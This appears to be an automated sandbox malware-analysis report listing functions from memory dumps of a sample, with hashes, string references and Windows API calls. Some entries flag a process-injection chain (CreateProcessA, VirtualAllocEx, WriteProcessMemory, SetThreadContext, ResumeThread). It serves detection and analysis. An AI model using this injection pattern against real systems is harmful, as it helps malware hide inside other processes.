Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f6542f5172ac68c0628f1e9b22ccaa8d729dc31be6998d4f2301fd35df0dc6c
Instruction ID: 7324a81acfbc001c06e39f10de81b7a2a3900bbc0ec4b2ad82a9113db07b2e96
Opcode Fuzzy Hash: 2f6542f5172ac68c0628f1e9b22ccaa8d729dc31be6998d4f2301fd35df0dc6c
Instruction Fuzzy Hash: D332AEB17012058FEB19DB69C594BAEBBF6EF89700F1484A9E046DB391CB31ED01CB91

Function 07B06900 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ae14995d32a9e3d6d7f770af0240e6d59cd9defd6331d212c824b960f35916
Instruction ID: cf34ee43e33af3b63b62ea63626a7568d2a8e66183c9240b80009751e74ec25a
Opcode Fuzzy Hash: 63ae14995d32a9e3d6d7f770af0240e6d59cd9defd6331d212c824b960f35916
Instruction Fuzzy Hash: 1D6105B4911229EFDB14DFA8D888EEDBBF1FF49305F0440A9E405AB2A1CB745A54CF80

Function 07B068F0 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10d7bd590e586f03b2b9ca1acb5a0f5006a8fd95f15483d189dd169c6e3b007
Instruction ID: b938601318f714956c131c407488fabd85a944ed4d08752c1cfe04557d7945ce
Opcode Fuzzy Hash: b10d7bd590e586f03b2b9ca1acb5a0f5006a8fd95f15483d189dd169c6e3b007
Instruction Fuzzy Hash: 0651E3B4E11219EFDB15DFA8D888AEDBBF1FF49305F0440A9E405A7290CB745944CF85

Function 056AB570 Relevance: 6.6, Strings: 5, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hgq, xrefs: 056AB640
Hgq, xrefs: 056AB685
Hgq, xrefs: 056AB9C4
Hgq, xrefs: 056AB6CA
Hgq, xrefs: 056AB991

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: Hgq$Hgq$Hgq$Hgq$Hgq
API String ID: 0-2022333140
Opcode ID: 83712c82e0bd0a17a087d44b574e536e4d03cfcdb450f693e46679bcd84250d5
Instruction ID: 9c64c427fb9c06252f286e50ba51502c71b3a7d88843ab938c574df92a8b24a8
Opcode Fuzzy Hash: 83712c82e0bd0a17a087d44b574e536e4d03cfcdb450f693e46679bcd84250d5
Instruction Fuzzy Hash: 9AB159357002088FCB59EFB8C5589AE77F6BF89304B6444A9D402AB7A0DF35ED45CB61

Function 056A1820 Relevance: 4.0, Strings: 3, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(gq, xrefs: 056A451A
Hgq, xrefs: 056A45D8
Hgq, xrefs: 056A46C6

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: (gq$Hgq$Hgq
API String ID: 0-3930999914
Opcode ID: 14f0d7c5084a487684f9053526f4aa568e436236ea512a558ca51fbf70ca0ef1
Instruction ID: 5386fa2b062d7fd08325dd78d1bed49152eeb80ef85234e80058695a49bd61ee
Opcode Fuzzy Hash: 14f0d7c5084a487684f9053526f4aa568e436236ea512a558ca51fbf70ca0ef1
Instruction Fuzzy Hash: 8D71AE71B0020A9FCB14AFB8C85566F7AB6EFC8300B10896AD546DB391DF349C46CBA5

Function 056A5988 Relevance: 2.7, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hgq, xrefs: 056A5AB6
Hgq, xrefs: 056A5A50

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: Hgq$Hgq
API String ID: 0-3391890871
Opcode ID: 88eb99120de8bc99ead159afabde4885abf4405784d330af455afcf1edcbe489
Instruction ID: 696b2d291c1da70bdcc5b75d5d8a9d6448b165aee5bee7311b19ca5d3533c5de
Opcode Fuzzy Hash: 88eb99120de8bc99ead159afabde4885abf4405784d330af455afcf1edcbe489
Instruction Fuzzy Hash: 75718B75E002198FDF04DFA9C854AAEBBF2BF89300F24852AE406EB354DB749D05CB91

Function 056A1830 Relevance: 2.6, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hgq, xrefs: 056A428B
Hgq, xrefs: 056A42E2

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: Hgq$Hgq
API String ID: 0-3391890871
Opcode ID: 183c6d9368e22501f0c27c7018a2e3cf3cee4eb498c7a78cc135ed1edee6bb0f
Instruction ID: e8d4a1c818f1b7fcf088f0faa41f349fc54e45feade40abd5c22bd8d3f660f5e
Opcode Fuzzy Hash: 183c6d9368e22501f0c27c7018a2e3cf3cee4eb498c7a78cc135ed1edee6bb0f
Instruction Fuzzy Hash: 3F5189B5A002098FCB14DFA9C8546AEBBF6FF89310F14846AD416E7380DB789D05CBA1

Function 056A4440 Relevance: 2.6, Strings: 2, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(gq, xrefs: 056A451A
Hgq, xrefs: 056A45D8

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: (gq$Hgq
API String ID: 0-3303014377
Opcode ID: 2f058fa2b1334442df808b7805208a1735279da89f4b5f16d9a52d6fd7d3a819
Instruction ID: 897a3d67f9339814ee3a368310b8c9d12aadc7a56248a0de4457628766358c7a
Opcode Fuzzy Hash: 2f058fa2b1334442df808b7805208a1735279da89f4b5f16d9a52d6fd7d3a819
Instruction Fuzzy Hash: D331F1B1B0010A9FDB48ABBCC82567F7EA6EFD8300B11896A9546A73D4DE348C428794

Function 07B03DFC Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B0403E

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a998e3441a76930e4a322da30f7b17fb18a2a71efd01834eb1e3c4f7f289b2a2
Instruction ID: fe99a8444d17ca1d793162828bd6f15e6a3bb0b892b15346a337cb17ffdbe0ec
Opcode Fuzzy Hash: a998e3441a76930e4a322da30f7b17fb18a2a71efd01834eb1e3c4f7f289b2a2
Instruction Fuzzy Hash: 25915CB1D0025ADFEB10DFA8C84579EBFB2FB45314F1481A9D809A7290DB749985CF92

Function 07B03E08 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B0403E

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 351ab059a09db824a2326cce3de29a1bc966b5ada61e8ed1d273fffead621e6c
Instruction ID: bb793cbec16532baf19045aff0cf5c6d3a8c08f2c9dd346893e9e7b216cd3537
Opcode Fuzzy Hash: 351ab059a09db824a2326cce3de29a1bc966b5ada61e8ed1d273fffead621e6c
Instruction Fuzzy Hash: 85915CB1D0025ACFEF10DFA8C84579EBFB2FB45310F1481A9D809A7290DB749985CF92

Function 0187B478 Relevance: 1.7, APIs: 1, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0187B6DE

Memory Dump Source

Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5d22856a71afcee563fbb3ea579211bb4905a536ab4b01b66a6783c79b01b658
Instruction ID: 19988a1906d7f0a1734a87e177bf33545470945ce0a7dbbc2ef4f63b7bceb37e
Opcode Fuzzy Hash: 5d22856a71afcee563fbb3ea579211bb4905a536ab4b01b66a6783c79b01b658
Instruction Fuzzy Hash: 459178B0A00B058FD725DF29D44575ABBF2FF48304F048A2DE586DBA50D774EA49CB91

Function 0187590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018759C9

Memory Dump Source

Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8c78b10458261e09a220af58bd57f46be391cdcfaf7fa90f586ca1a6d582945f
Instruction ID: 44226b84b23343e0ce47f7bf78c89115613f82e83d93ac4a1b6025e06f0fa4a7
Opcode Fuzzy Hash: 8c78b10458261e09a220af58bd57f46be391cdcfaf7fa90f586ca1a6d582945f
Instruction Fuzzy Hash: 7041D1B1C0071DCADB24DFA9C984BDDBBB5BF49304F20806AD408AB251DB75A945CF51

Function 018744B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 018759C9

Memory Dump Source

Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c83a93d5f65549c3f4572f08d56d1736bfd804756f508f75b3db86bcfb964e3e
Instruction ID: 6284d9642301a012f04cea08d5ecd1d4f58b8124d9a9d19f8acd75c72a94d374
Opcode Fuzzy Hash: c83a93d5f65549c3f4572f08d56d1736bfd804756f508f75b3db86bcfb964e3e
Instruction Fuzzy Hash: CA41BFB0C0071DCBDB24DFA9C884BDDBBB5BF49304F60806AD409AB251DB75AA45CF91

Function 07B03B79 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B03C10

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b5048e7cfcf7fed4b8dc83c26f8c9eed5a2c12edb3df265483a6c030e1c9d410
Instruction ID: 2e3b673577c8237b72be5a728df16ffab7a5c955904bb6385c21bfe432c55401
Opcode Fuzzy Hash: b5048e7cfcf7fed4b8dc83c26f8c9eed5a2c12edb3df265483a6c030e1c9d410
Instruction Fuzzy Hash: 8F2124B5D003199FDB10CFA9C885BDEBFF5FB88314F10882AE919A7240C7789955DBA1

Function 07B03B80 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B03C10

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2ead5e1941abee5809798e2b28e2a7bbf2bb20237c2f67aaeb7c5dc865b3c757
Instruction ID: d1440d223dca8c2e6d7881c810a7dc01127517bc2dd19eb5c0eac8c5efba42cc
Opcode Fuzzy Hash: 2ead5e1941abee5809798e2b28e2a7bbf2bb20237c2f67aaeb7c5dc865b3c757
Instruction Fuzzy Hash: ED2104B19003499FDB10CFA9C885ADEBBF5FB88310F10882AE919A7240C7789954DBA1

Function 07B03C68 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B03CF0

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e193759fc8c918f261471cc946fd308bb1ac18a69619b8e209cdefbbf9dceeb5
Instruction ID: 0b4dda9b96249bfd7d73969806bc140adce3b108f5529af6c9f9c100af6cf885
Opcode Fuzzy Hash: e193759fc8c918f261471cc946fd308bb1ac18a69619b8e209cdefbbf9dceeb5
Instruction Fuzzy Hash: 1921F6B1C002599FDB10DFA9C845ADEBFF5FF88310F10882AE519A7240C7749555DBA1

Function 0187B374 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0187D92E,?,?,?,?,?), ref: 0187D9EF

Memory Dump Source

Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9b5542d26e294c4f9b5fa1c49b72ece992702a604e70b664a467f7272f4c1173
Instruction ID: 284d496bca7770f61e5e4341b0df7291cb934b219b486d49bae4afc9d355de10
Opcode Fuzzy Hash: 9b5542d26e294c4f9b5fa1c49b72ece992702a604e70b664a467f7272f4c1173
Instruction Fuzzy Hash: 7F21D2B5D00249AFDB10CF9AD484ADEFBF9EB48310F14851AE918A3350D374A954CFA5

Function 07B039E0 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B03A66

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ddb031728a1cb660fffb7be033951faf292249e001b00209d917d31d69d0656e
Instruction ID: 6066ba427e5a1a84a0c5ba847ef3b531266ceba006f5a8f321326fb7a6363eb9
Opcode Fuzzy Hash: ddb031728a1cb660fffb7be033951faf292249e001b00209d917d31d69d0656e
Instruction Fuzzy Hash: CA2137B5D002098FDB10DFAAC4857AEBFF4EF88314F14842ED459A7280DB789A45CFA1

Function 07B03C70 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B03CF0

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9f86c496241b8fd02043971a882c933f3e253e0af017d1c1cc17af356740b0f3
Instruction ID: 5e56c95aa167bc430fe482828f29d8bd11d87a1e9570f38aa754d4669c426cf3
Opcode Fuzzy Hash: 9f86c496241b8fd02043971a882c933f3e253e0af017d1c1cc17af356740b0f3
Instruction Fuzzy Hash: 5E2116B1C003599FDB10DFAAC845ADEBFF5FF88310F10842AE519A7240C7789544DBA1

Function 07B039E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B03A66

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fa55cc1cc3283b7a9fbf530bb9221c02244fc27d7daa6880f5282b240d9af957
Instruction ID: d68b34ba5b3124ae817f418a436567f90f4d15f043dcb4fd2b2a84d287c436de
Opcode Fuzzy Hash: fa55cc1cc3283b7a9fbf530bb9221c02244fc27d7daa6880f5282b240d9af957
Instruction Fuzzy Hash: F92107B1D002099FDB10DFAAC4857AEBFF4EF88324F14842AD519A7241CB789A45CFA5

Function 07B03AB8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B03B2E

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fae96cf0eaa39cbffcd9c9b63b3daa5bf96e1dcb2ec422590f6c517da48e1f86
Instruction ID: f7a82e5869d07ca6f9fa551dce16d8a1e1ec4a4f5e857aa0a3a7942ab84398b9
Opcode Fuzzy Hash: fae96cf0eaa39cbffcd9c9b63b3daa5bf96e1dcb2ec422590f6c517da48e1f86
Instruction Fuzzy Hash: 071156B2C002499FDB10DFA9C848ADEBFF5EF88314F20881AE819A7250C7759554CFA1

Function 07B03AC0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07B03B2E

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b51285608cd9bf1f1eac6549a11e947a0695565dac44244b63aaa41e1d39c19c
Instruction ID: e3a6fbd220b842fabbd0240ae64139ae7a0f3dbc8b41a1245f75f78277db744a
Opcode Fuzzy Hash: b51285608cd9bf1f1eac6549a11e947a0695565dac44244b63aaa41e1d39c19c
Instruction Fuzzy Hash: 671126B2D002499FDB10DFAAC845ADEFFF5EF88324F108819E519A7250C775A554CFA1

Function 07B03931 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07B0399A

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0484a577ae7133c31cfc6352e62fa414e653aaa58dea5b553cb62e2bba32e335
Instruction ID: b9ce389de7df8915e5ed01f7e008824aa98529fb1e458eb86393391e430e8c24
Opcode Fuzzy Hash: 0484a577ae7133c31cfc6352e62fa414e653aaa58dea5b553cb62e2bba32e335
Instruction Fuzzy Hash: 121128B1D002498BDB10DFA9C5497AEFFF5AB88314F24881AD41AA7340CB78A545CF95

Function 07B03938 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 07B0399A

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 200a25ec35fbb154729ea3792ca5ce60c8cf4def98a9f1c86fffd50679a95fbe
Instruction ID: b801f1a9388de422f6913b8b619ff41e6b1c1395297641c00bdf6ee195440060
Opcode Fuzzy Hash: 200a25ec35fbb154729ea3792ca5ce60c8cf4def98a9f1c86fffd50679a95fbe
Instruction Fuzzy Hash: B411F8B1D002498BDB10DFAAC44979EFFF5EB88324F24881AD51AA7240CB79A545CF95

Function 0187B678 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0187B6DE

Memory Dump Source

Source File: 00000000.00000002.2346644915.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_LEmJJ87mUQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4fc36675ea29a18e023ece3422ed207e13dbaf83cda865d66b875af075e4e156
Instruction ID: a30e8f22a96a7d367cf5bdbd9d1537a15efbd2dfad0ac46cc2de42f293ea2ac6
Opcode Fuzzy Hash: 4fc36675ea29a18e023ece3422ed207e13dbaf83cda865d66b875af075e4e156
Instruction Fuzzy Hash: 9811E0B5C002498FDB10DF9AD444ADEFBF5EF88314F10841AD529A7610C379A645CFA5

Function 07B08E41 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07B08EA5

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4865cfef6a2075347b7e6c18618c387befd0ca3b7be979b57ed3360238727068
Instruction ID: 43244c670a40f6da79d7553178280a05b66ae279b9e86425e2e3b7f812653e9b
Opcode Fuzzy Hash: 4865cfef6a2075347b7e6c18618c387befd0ca3b7be979b57ed3360238727068
Instruction Fuzzy Hash: 5D11C2B5800249DFDB10CF99D949BDEBFF8EB48310F10885AD959A7750C379A644CFA1

Function 07B08E48 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07B08EA5

Memory Dump Source

Source File: 00000000.00000002.2351586742.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b00000_LEmJJ87mUQ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6e2916162e07aade90db6dde04bc893ae9829c5e62a293ca75878019ce4eaa2d
Instruction ID: b5cdcb5e34362057d42698f87b30982c8d8f89ee65cb0004a890e3d039f91813
Opcode Fuzzy Hash: 6e2916162e07aade90db6dde04bc893ae9829c5e62a293ca75878019ce4eaa2d
Instruction Fuzzy Hash: 9E11D3B58003499FDB10DF9AD849BDEBFF8EB48320F10845AD559A7250C379A544CFA5

Function 056A1858 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

Tecq, xrefs: 056A19B9

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: Tecq
API String ID: 0-1122318316
Opcode ID: bb9eb30d74a85bf8860b2d79e5a30b174352b6ac50a4206381c7fe7a9c2f8efd
Instruction ID: 5dd4c9ab0840f5a101f55aee8850de3f1f7d4a91638d4824442ced29a0d1be86
Opcode Fuzzy Hash: bb9eb30d74a85bf8860b2d79e5a30b174352b6ac50a4206381c7fe7a9c2f8efd
Instruction Fuzzy Hash: 0A418C75B0020A8FCB10EF79C8589AEBBF6FFC5220B248969E415DB391DB309D05CB90

Function 056AFD30 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

, xrefs: 056AFE3E

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7efcacd3b645077ea164a7b278f810c554c47bc3d1b8265f0810208cabf604c4
Instruction ID: 3d104c95e7866de3160135923515511b51614aaaf8329e9e9bfcf0e76765aa9c
Opcode Fuzzy Hash: 7efcacd3b645077ea164a7b278f810c554c47bc3d1b8265f0810208cabf604c4
Instruction Fuzzy Hash: A6510776A0024A9FCB10DF69D444A9EFBF1FF88315F14822AE819A7351E734A991CF90

Function 056A5038 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Hgq, xrefs: 056A5049

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: Hgq
API String ID: 0-2103768809
Opcode ID: 76d42b68a05704d28d0924a6ce982769f633e960d0729d5bd98cdc321abe807c
Instruction ID: dfc2d12eb7531d1c85a47722c25d5a9cf494d824e832a9122d2f6b4c3f8496d5
Opcode Fuzzy Hash: 76d42b68a05704d28d0924a6ce982769f633e960d0729d5bd98cdc321abe807c
Instruction Fuzzy Hash: C131E175A0020ADFDF05EFA4D9559AEBBB6FF98304F10452AE002BB294DF349C45CB90

Function 056A81FC Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

PHcq, xrefs: 056A9CA7

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: PHcq
API String ID: 0-4245845256
Opcode ID: 7dd6877b9d21095abc75c22cfefd3bc7a5a503de89fdaf9b9469f1c42b4ae090
Instruction ID: f67e97c3bf2cc559b4d90eafa3b95a2baffa5260f2ab12b0f6f86251c8a2e7b2
Opcode Fuzzy Hash: 7dd6877b9d21095abc75c22cfefd3bc7a5a503de89fdaf9b9469f1c42b4ae090
Instruction Fuzzy Hash: 0F1172357045058FDB18AA75C9585BE7AFAAF89300F254469E403EB350DF319D00CF94

Function 056A9BF8 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

PHcq, xrefs: 056A9CA7

Memory Dump Source

Source File: 00000000.00000002.2350407580.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_LEmJJ87mUQ.jbxd

Similarity

API ID:
String ID: PHcq
API String ID: 0-4245845256
Opcode ID: 4e54eb9f9f79c7fa427f8d8f93f0185dc54c868540c118d5384ccf7cac45bc91
Instruction ID: b630173d63fc6f38f355d4cd86b3a5e97c24ec18a433f31b50bd63a5d85c6729
Opcode Fuzzy Hash: 4e54eb9f9f79c7fa427f8d8f93f0185dc54c868540c118d5384ccf7cac45bc91
